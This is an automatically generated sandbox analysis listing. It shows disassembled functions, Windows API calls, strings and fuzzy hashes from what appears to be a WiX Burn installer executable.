String ID: comres.dll
API String ID: 203985260-246242247
Opcode ID: 65e8a5484ee01295a3b67b32fa210f1a6338fec78e66ae87b2762df118482033
Instruction ID: c21813ea7a3eac35369db64f64e2bc0bde127162238773b326babfdc7fbbf41a
Opcode Fuzzy Hash: 65e8a5484ee01295a3b67b32fa210f1a6338fec78e66ae87b2762df118482033
Instruction Fuzzy Hash: 0E31093160024DEBDB21AF65C889BBB3B68AF52B50F140225FB14DB395DB78CD00D7A1

Function 00808E07 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00808CFB: lstrlenW.KERNEL32(00000100,?,?,00809098,000002C0,00000100,00000100,00000100,?,?,?,007E7B40,?,?,000001BC,00000000), ref: 00808D1B

RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0080B4F0,wininet.dll,?), ref: 00808F07
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0080B4F0,wininet.dll,?), ref: 00808F14

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

Part of subcall function 00800D1C: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,007E8BD8), ref: 00800D77
Part of subcall function 00800D1C: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007E8BD8,00000000), ref: 00800D99

Strings

wininet.dll, xrefs: 00808E7C, 00808EC9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Close$EnumInfoOpenQuerylstrlen
String ID: wininet.dll
API String ID: 2680864210-3354682871
Opcode ID: 02292bdf2129121c6d536013e34e737b5711ac8b73c38edcf96f3bcf3ff3f752
Instruction ID: a5334315299765c313d6d56ad8b23e2146c1bf8ef4749270dcd78120976cd220
Opcode Fuzzy Hash: 02292bdf2129121c6d536013e34e737b5711ac8b73c38edcf96f3bcf3ff3f752
Instruction Fuzzy Hash: 58313776C0052AEFCF61AFA8CC818AFBB79FF04350B514169E941B6161DB318E909FA0

Function 00809220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00808CFB: lstrlenW.KERNEL32(00000100,?,?,00809098,000002C0,00000100,00000100,00000100,?,?,?,007E7B40,?,?,000001BC,00000000), ref: 00808D1B

RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000), ref: 00809305
RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 0080931F

Part of subcall function 00800AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,007D0491,?,00000000,00020006), ref: 00800AFA

Part of subcall function 00801392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF1C2,00000000,?,00020006), ref: 008013C5

Part of subcall function 00801392: RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,007CF1C2,00000000,?,00020006,?,00020006,00020006,00000000,?,?,?), ref: 008013F5

Part of subcall function 00801344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,007CF11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00801359

Strings

%ls\%ls, xrefs: 00809281

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: 4afbadaaed948ab441bec65929b67c788f4eea50b388a261c33ba8bf0365d1d7
Instruction ID: d90c048f3a31767caab27f85eed1eb244962ee87bb4d53d37d1a5582ca63ec10
Opcode Fuzzy Hash: 4afbadaaed948ab441bec65929b67c788f4eea50b388a261c33ba8bf0365d1d7
Instruction Fuzzy Hash: 25310A72C0152EFFCF629F94CC818AEBBB9FF04750B41417AE950B2261D7318E519B91

Function 007C39CF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 007C3A32

Strings

crypt32.dll, xrefs: 007C39EF, 007C3A2E, 007C3A30
wininet.dll, xrefs: 007C39F0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: _memcpy_s
String ID: crypt32.dll$wininet.dll
API String ID: 2001391462-82500532
Opcode ID: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
Instruction ID: 5f666818ad6ba5f25fe233f310fa9ddeafcc74c6a6918aba87e484c9a0d4c953
Opcode Fuzzy Hash: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
Instruction Fuzzy Hash: D0114D71600219ABCF08DE19CD99E9FBB69EF98350B14C12EFC094B311D635EA208AE0

Function 00801392 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF1C2,00000000,?,00020006), ref: 008013C5
RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,007CF1C2,00000000,?,00020006,?,00020006,00020006,00000000,?,?,?), ref: 008013F5

Strings

regutil.cpp, xrefs: 00801429

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: f0a6380fce8f122dcc46cd9b9eaef2a6fef8777e11151f480c207c184e6abd19
Instruction ID: 50b1ca408a8fe3be7c8fad4d78621a8b0028977718e353acd4ea8fdb5ca78ab6
Opcode Fuzzy Hash: f0a6380fce8f122dcc46cd9b9eaef2a6fef8777e11151f480c207c184e6abd19
Instruction Fuzzy Hash: 5711C632E0163ABBEF225E698C09BAA76A6FF04760F014225FD00EA1E0D771CD1196D4

Function 007CDCA5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,007E744B,00000000,IGNOREDEPENDENCIES,00000000,?,0080B508), ref: 007CDCF6

Strings

IGNOREDEPENDENCIES, xrefs: 007CDCAD
Failed to copy the property value., xrefs: 007CDD2A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: 89e152424ea3c1fee8392f6f656849d499dd5018070f995a0fbda4d64bcba4f0
Instruction ID: 152ca4476a9963ca941634b026b3d7c87133c1f7900b575082756177fb846000
Opcode Fuzzy Hash: 89e152424ea3c1fee8392f6f656849d499dd5018070f995a0fbda4d64bcba4f0
Instruction Fuzzy Hash: 1211A032604215AFDB304F58CC84FA9B7A5FF18330F26427EEA199B291D7B4AC50DA90

Function 008054F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,007D8C90,?,00000001,20000004,00000000,00000000,?,00000000), ref: 00805527
SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007D8C90,?), ref: 00805542

Strings

aclutil.cpp, xrefs: 00805565

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: cf68342e37681bc8802a91d7c879f2f205cba0d87ab826d2ed8e0d3a445c4692
Instruction ID: 25a4ca0d1a5ef648774dfa693e64393b248990ae76aac0a3bee872471ae0c412
Opcode Fuzzy Hash: cf68342e37681bc8802a91d7c879f2f205cba0d87ab826d2ed8e0d3a445c4692
Instruction Fuzzy Hash: 0A015E73900529BBDF629E99DD05ECF7E7AFF84760F050115BE05A7160D6318E609BA0

Function 007D55BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 007D55D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 007D5633

Strings

Failed to initialize COM on cache thread., xrefs: 007D55E5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: 9d4cbc6c89f47dcc84585f6ca69fb4ce0879695c50b8e931ab1f60975e671595
Instruction ID: e88805ccf7e63ba6046380e0c1dd77bdc33a564710183813f70fac17e5f32677
Opcode Fuzzy Hash: 9d4cbc6c89f47dcc84585f6ca69fb4ce0879695c50b8e931ab1f60975e671595
Instruction Fuzzy Hash: 3C016D72600619BFC7058FA9DC84DD6FBACFF08354B508126FA09D7221DB35AD648B90

Function 007C155F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,00000000,007D6EF3,00000000,007D6EF3,00000000,00000000,007D6EF3,00000000,00000000,00000000,?,007C2326,00000000,00000000), ref: 007C15A3
GetLastError.KERNEL32(?,007C2326,00000000,00000000,007D6EF3,00000200,?,0080516B,00000000,007D6EF3,00000000,007D6EF3,00000000,00000000,00000000), ref: 007C15AD

Strings

strutil.cpp, xrefs: 007C15D1

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: 1ff23e1281242124e3bf8b4369fe1baf54cc2a909e328d5534712e0722e2e0c2
Instruction ID: 8a4b68748faa47b5ea7bb7e256f069dfc5de21a8cd2d7f440f06cee8d72af340
Opcode Fuzzy Hash: 1ff23e1281242124e3bf8b4369fe1baf54cc2a909e328d5534712e0722e2e0c2
Instruction Fuzzy Hash: 1601B533A00625A7DB219E969C44F577BA9EF86760B01012DFE25DB151D624DC2097E1

Function 0080388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 008038D0
SysFreeString.OLEAUT32(00000000), ref: 00803903

Strings

xmlutil.cpp, xrefs: 008038A0, 008038E7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: c46b1a0c7c923c50f14d6440164ef9fc4573bc7e40ee45d7d7064a714519bb4e
Instruction ID: ac2cd1358a207154bbee4cc76d050f86e2cfb30be7f9f9e7def58e344c2f8745
Opcode Fuzzy Hash: c46b1a0c7c923c50f14d6440164ef9fc4573bc7e40ee45d7d7064a714519bb4e
Instruction Fuzzy Hash: C9012875A40219ABEB615A949C09F7A3ADCFF467A0F158069FD05EB380C6B88E0096A1

Function 00803803 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00803849
SysFreeString.OLEAUT32(00000000), ref: 0080387C

Strings

xmlutil.cpp, xrefs: 00803819, 00803860

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 4c33fb2cdc8ca82e5c6eea8cacfabf882bc26275f13c8339b01f122827531d42
Instruction ID: ea4a470a72bc3d5365930f3c6604984949de3877b261f857347ef6494f7a448f
Opcode Fuzzy Hash: 4c33fb2cdc8ca82e5c6eea8cacfabf882bc26275f13c8339b01f122827531d42
Instruction Fuzzy Hash: 8C018F75640219ABDB611B948C08F7A32DCFF45764F118079FE14E7780C778CE4197A1

Function 00803AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,0080396A,?), ref: 00803B3A

Strings

EnableLUA, xrefs: 00803B0C
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00803AE4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 47109696-3551287084
Opcode ID: b852a9d54d3aabc2ad1f18ac18024777f5b99254883f08898ece33d09992a1cf
Instruction ID: 4614fb1b5a5482d75ff9a15183d155f8073966efcc70bb63cfcb0e21122fe7fd
Opcode Fuzzy Hash: b852a9d54d3aabc2ad1f18ac18024777f5b99254883f08898ece33d09992a1cf
Instruction Fuzzy Hash: 56017C32C10238EBD750AAA8CC1BBEEFBACFB04725F200165A900F3190E3745E50DB94

Function 007C501B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,007C1104,?,?,00000000), ref: 007C503A
CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,007C1104,?,?,00000000), ref: 007C506A

Strings

burn.clean.room, xrefs: 007C5027, 007C5034, 007C5061

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 007faa96b1e99f920f034b4dbf40095e4337615821f349c77f513cae95aa7949
Instruction ID: b9153b64df779f82c1779b6b2284a2b00bc386ba113e06f6703803819ef5fbfb
Opcode Fuzzy Hash: 007faa96b1e99f920f034b4dbf40095e4337615821f349c77f513cae95aa7949
Instruction Fuzzy Hash: 4A0162726006256F83344B699C84E73B76CFF14B60710811EF946C2610D376ACC1C7E1

Function 00806754 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 008067B3

Part of subcall function 008085CB: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008086D8
Part of subcall function 008085CB: GetLastError.KERNEL32 ref: 008086E2

Strings

atomutil.cpp, xrefs: 008067A1
clbcatq.dll, xrefs: 00806780

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Time$ErrorFileFreeLastStringSystem
String ID: atomutil.cpp$clbcatq.dll
API String ID: 211557998-3749116663
Opcode ID: 061f25c28c52e8bc56ad8aac9d05fee75da435b1c7192641dac53bd34942f5b7
Instruction ID: 2b349ef39f09219ac4014e68e41bc6ef5b0cdc7e9e8d21f4ff54068af5ac992d
Opcode Fuzzy Hash: 061f25c28c52e8bc56ad8aac9d05fee75da435b1c7192641dac53bd34942f5b7
Instruction Fuzzy Hash: FC018FB190111AFBDB609F859D81C6AFBB8FF44764B51427AF604E7240E7315E30D7A0

Function 007C6418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 007C642A

Part of subcall function 008009BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5D8F,00000000), ref: 008009CF
Part of subcall function 008009BB: GetProcAddress.KERNEL32(00000000), ref: 008009D6
Part of subcall function 008009BB: GetLastError.KERNEL32(?,?,?,007C5D8F,00000000), ref: 008009ED

Part of subcall function 007C5BF0: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 007C5C77

Strings

Failed to get 64-bit folder., xrefs: 007C644D
Failed to set variant value., xrefs: 007C6467

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: b0ab105b0a35d04d874349c333700d38260512569b9fd772ca13fd323e2ad182
Instruction ID: 06d16d65d48ce6b05445f3164037bcef7f89b34479dba1ded424f4de16fdfef2
Opcode Fuzzy Hash: b0ab105b0a35d04d874349c333700d38260512569b9fd772ca13fd323e2ad182
Instruction Fuzzy Hash: 43014F72901668BBCF25AB94CC45FAE7B68EF04721F10425DB900A6192D7799F50D6D0

Function 007C33D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33F8
GetLastError.KERNEL32(?,?,?,007C10DD,?,00000000), ref: 007C340F

Strings

pathutil.cpp, xrefs: 007C3433

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: ce14f565c2d1ef3532c058a98e8b13d3d0378f589ed5fcd63b01bcadce4a4e00
Instruction ID: 149b1bbfad47e15801661a91bf433b2199374170da44981aa1295376c7665f7e
Opcode Fuzzy Hash: ce14f565c2d1ef3532c058a98e8b13d3d0378f589ed5fcd63b01bcadce4a4e00
Instruction Fuzzy Hash: 42F09673B006706BD762666A9C48F97BB99EB457A0B12812DFD05EB150D769CE0182F0

Function 007D0598 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000,?,?,007EBB7C,00000101,?), ref: 007D05EF

Strings

Failed to open registration key., xrefs: 007D05BF
Failed to update resume mode., xrefs: 007D05D9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update resume mode.
API String ID: 47109696-3366686031
Opcode ID: 51456316bfc58cab0512b5632de0bf5f538497187677b0a1899e09ad050b0de7
Instruction ID: 159a6083e6b3d0f41843d140581829462a8c460227808bab9a981c65da0278a8
Opcode Fuzzy Hash: 51456316bfc58cab0512b5632de0bf5f538497187677b0a1899e09ad050b0de7
Instruction Fuzzy Hash: 38F0C832941228B7CB125A94DC06FDEB779FF00760F10006AFA00B6290DB79AF60ABD0

Function 008048CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,762334C0,?,?,?,007CB919,?,?,?,00000000,00000000), ref: 008048E3
GetLastError.KERNEL32(?,?,?,007CB919,?,?,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008048ED

Strings

fileutil.cpp, xrefs: 00804911

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 8c752f50bff50f85c4aeb9d980662a7379bd448b5bc8eb159723ff54f28850d4
